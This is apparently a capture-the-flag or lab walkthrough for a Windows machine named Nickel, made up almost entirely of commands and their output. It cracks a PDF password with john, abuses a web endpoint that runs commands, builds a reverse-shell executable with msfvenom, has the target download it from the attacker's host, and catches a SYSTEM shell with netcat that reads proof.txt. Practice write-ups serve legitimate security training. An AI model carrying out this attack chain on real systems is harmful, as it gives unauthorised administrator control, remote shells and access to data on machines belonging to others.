Priv Esc

NowiseSloopTheory139

PS C:\Users\ariah> ls C:\


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         9/1/2020  12:38 PM                ftp
d-----         9/1/2020  12:04 PM                PerfLogs
d-r---        4/14/2022   5:22 AM                Program Files
d-r---        4/14/2022   4:43 AM                Program Files (x86)
d-r---         9/1/2020  12:38 PM                Users
d-----        4/14/2022   5:23 AM                Windows
-a----        8/28/2024   5:40 PM           2693 output.txt


PS C:\Users\ariah> ls C:\ftp\


    Directory: C:\ftp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/1/2020  11:02 AM          46235 Infrastructure.pdf

PS C:\Users\ariah> copy C:\ftp\Infrastructure.pdf .

$ scp ariah@192.168.241.99:Infrastructure.pdf .

$ pdf2john Infrastructure.pdf > pdf.hash

$ john pdf.hash --wordlist=~/rockyou.txt 

ariah4168

$ curl http://192.168.241.99/?whoami

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1337 -f exe -o shell.exe  

$ python -m http.server 80

$ nc -lnvp 1337

ariah@NICKEL C:\ProgramData>curl 192.168.45.233/shell.exe -o shell.exe

$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.241.99] 49766
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
nickel
nt authority\system
9614154844e05f926e2f501e88fcc495

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.241.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.241.254

C:\Windows\system32>